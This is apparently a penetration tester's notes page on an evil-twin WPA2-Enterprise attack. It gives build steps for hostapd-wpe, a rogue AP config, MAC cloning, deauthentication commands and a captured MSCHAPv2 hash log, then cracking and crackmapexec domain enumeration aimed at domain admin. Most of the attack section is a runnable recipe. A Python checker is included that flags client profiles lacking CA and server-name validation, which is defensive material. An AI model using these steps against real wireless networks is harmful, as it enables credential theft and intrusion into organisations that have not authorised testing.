# HOSTAPD-WPE

[**hostapd-wpe**](https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe)

Install the build dependencies (Debian/Kali package names):

```
apt-get install libssl-dev libnl-genl-3-dev libnl-3-dev pkg-config libsqlite3-dev build-essential wget --no-install-recommends
```

Download the files:

```
wget https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/hostapd-2.10-wpe.patch
wget https://w1.fi/releases/hostapd-2.10.tar.gz
tar -zxf hostapd-2.10.tar.gz
cd hostapd-2.10
patch -p1 < ../hostapd-2.10-wpe.patch
cd hostapd
```

Build and install from the patched `hostapd/` directory:

```
make
make install
make wpe
```

**Creating certs**

```
cd /etc/hostapd-wpe/certs
./bootstrap
make install
```

Create the AP configuration file (`vim wpeattackap.conf`):

```
# ------------------------------
# common hostapd configuration
# ------------------------------
interface=wlan0mon
# name of the AP (needed even if it is hidden); hostapd only accepts
# whole-line comments, so every comment is kept on its own line
ssid=XX-AP
channel=4
hw_mode=g

# --------------------
# WPA configuration
# --------------------
# use WPA2 version
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP

# --------------------------
# EAP server configuration
# --------------------------
# requires 802.1X authentication server
ieee8021x=1
# EAPOL key index fix for WinXP supplicant (disabled here)
eapol_key_index_workaround=0
# enable integrated EAP server instead of RADIUS
eap_server=1
# filename containing information of users
#eap_user_file=fakenet.eap_user

# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
#ca_cert=/root/certs/ca.pem
#server_cert=/root/certs/server.pem
# private key for the server certificate
#private_key=/root/certs/server.key
# password used to encrypt the private key (empty here)
#private_key_passwd=
# file path to DH/DSA parameters file (in PEM format)
#dh_file=/root/certs/dhparam.pem

eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh

# -----------------------------
# mana specific configuration
# -----------------------------
# enable WPE mode to intercept various EAP credentials
#mana_wpe=1
# return EAP success to the clients, and have them connect
#mana_eapsuccess=1
```

Use the same MAC address as the target AP:

```
macchanger --mac xx:xx:xx:xx:xx:xx <interface>
```

```
sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf
```

```
sudo airodump-ng --channel 4 wlp0s20f3 -w temp --essid-regex XX-AP
```

Deauth (with the MAC clone, deauth is not necessary if the signal is strong \m/)

```
sudo aireplay-ng --deauth 50 -a 6c:8d:77:27:a1:25  --ignore-negative-one wlp0s20f3
```

**GOTCHA!**

```
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.1X: Identity received from STA: 'XXXX\xxx.xxx'


mschapv2: Fri Mar 15 03:36:34 2024
         username:      xxx\xxx.xx
         challenge:     57:f6xx:c6:33:4b
         response:      9e:2a:87xxxxx:ef:b2:58:4a:3f:b3:fd:1d:03:08
         jtr NETNTLM:           xx\xx.leao:$NETNTLM$57f6xc6334b$9exxxxxxx84a3fb3fd1d0308
         hashcat NETNTLM:       xx\xx.leao::::9e2a8702xxf6bbxxxx3fb3fd1d0308:57f6xxxc6334b
wlan0mon: STA 5c:fb:3a:2f:00:2f IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: associated (aid 3)
```
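The capture above only works because the supplicant completed the PEAP tunnel with whatever certificate the rogue AP presented, which is a client configuration problem rather than a protocol one. The checker below is an added example (not code from the original page or from hostapd-wpe): it parses `wpa_supplicant` `network={}` blocks and flags the two client-side settings whose absence lets a profile accept an impostor EAP server: no `ca_cert`/`ca_path`, and no server-name check (`domain_suffix_match`, `domain_match`, `altsubject_match` or `subject_match`). The sample configuration, its SSID reuse, the CA path and the RADIUS server name are all constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample wpa_supplicant.conf (assumption, not taken from the page):
# the first profile trusts any EAP server certificate, the second is pinned to a
# corporate CA and checks the RADIUS server's name.
SAMPLE_CONF = """
ctrl_interface=/run/wpa_supplicant

network={
    ssid="XX-AP"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@example.local"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}

network={
    ssid="XX-AP"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@example.local"
    password="hunter2"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"   # constructed path
    domain_suffix_match="radius.example.local"     # constructed name
}
"""

_BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
# key=value with an optional trailing comment; a quoted value may contain '#'
_KV_RE = re.compile(r'^\s*([A-Za-z0-9_]+)\s*=\s*("[^"]*"|[^#]*?)\s*(?:#.*)?$')

# settings that make the supplicant verify the EAP server before sending credentials
CA_KEYS = ("ca_cert", "ca_path")
NAME_KEYS = ("domain_suffix_match", "domain_match", "altsubject_match", "subject_match")


def parse_networks(text: str) -> List[Dict[str, str]]:
    """One dict per network={...} block; surrounding quotes are removed from values."""
    networks: List[Dict[str, str]] = []
    for body in _BLOCK_RE.findall(text):
        entry: Dict[str, str] = {}
        for raw in body.splitlines():
            m = _KV_RE.match(raw)
            if m:
                entry[m.group(1)] = m.group(2).strip('"')
        networks.append(entry)
    return networks


def audit_network(net: Dict[str, str]) -> List[str]:
    """Findings for one profile. An empty list means the supplicant has enough
    information to reject a rogue EAP server; PSK/open profiles yield nothing."""
    if "eap" not in net:
        return []
    ssid = net.get("ssid", "?")
    inner = net.get("phase2", "").upper()
    findings: List[str] = []
    if not any(k in net for k in CA_KEYS):
        msg = f"{ssid}: no ca_cert/ca_path, any server certificate opens the {net['eap']} tunnel"
        if "MSCHAPV2" in inner:
            msg += " (inner MSCHAPv2 challenge/response is then handed to the impostor)"
        findings.append(msg)
    if not any(k in net for k in NAME_KEYS):
        findings.append(f"{ssid}: no server-name match, any certificate from the trusted CA is accepted")
    return findings


def audit_conf(text: str) -> Dict[int, List[str]]:
    """Map each network block index to its findings."""
    return {i: audit_network(n) for i, n in enumerate(parse_networks(text))}


if __name__ == "__main__":
    for idx, findings in audit_conf(SAMPLE_CONF).items():
        print(f"network[{idx}]:", findings or ["OK"])
```

Running it on the sample reports two findings for the first block and none for the second. NetworkManager and Windows profiles carry the equivalent settings (CA certificate plus server name), and a profile without them is what the log above looks like from the client side.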

Cracking it!

```
john-the-ripper hash 
```

<figure><img src="https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2FacI5VGxIbCVkaCRQEwcd%2Fimage.png?alt=media&#x26;token=1221077b-0676-4c1d-975a-880bb67be1ae" alt=""><figcaption></figcaption></figure>

## Getting Domain Admin From WiFi Scratch Approach \o/

Because the SSID is hidden, the client-side network profile has to be created as a "hidden" network.

<figure><img src="https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2FQ1Tc957NNhH2hxvesc9a%2Fimage.png?alt=media&#x26;token=c328619c-dad5-4f22-9bbf-2da3285eb838" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2F8cjqswPfd3MdHB0euvUA%2Fimage.png?alt=media&#x26;token=d4e73c37-c9b4-4fde-8356-09d5e89a4444" alt=""><figcaption></figcaption></figure>

```
cat /etc/resolv.conf
nameserver 127.0.0.53
options edns0 trust-ad
search xxx.local

ptavares@kali:~$ host xxxx.local
xxx.local has address 10.1.11.36
xxxx.local has address 10.0.4.1
xxxx.local has address 10.1.0.1
```

<figure><img src="https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2FqopKqOvsF8fKvUuMa3AU%2Fimage.png?alt=media&#x26;token=6ab31291-8a77-4bbd-8c93-9b37916d1149" alt=""><figcaption></figcaption></figure>

Bloodhound, or other tools, can be executed now \,)

```
crackmapexec smb DC01 -u '<user>' -p '<password>' --users
```

<figure><img src="https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWd-VcvRHVgUtkahm85%2Fuploads%2FnUIL7dvDeTXKpXACLAiN%2Fimage.png?alt=media&#x26;token=e5dfc569-9729-43b7-8d76-5bde47d88dbb" alt=""><figcaption></figcaption></figure>

## Reference

[https://www.netprojnetworks.com/wireless-pentest-lab-part-3/](https://www.netprojnetworks.com/wireless-pentest-lab-part-3/)
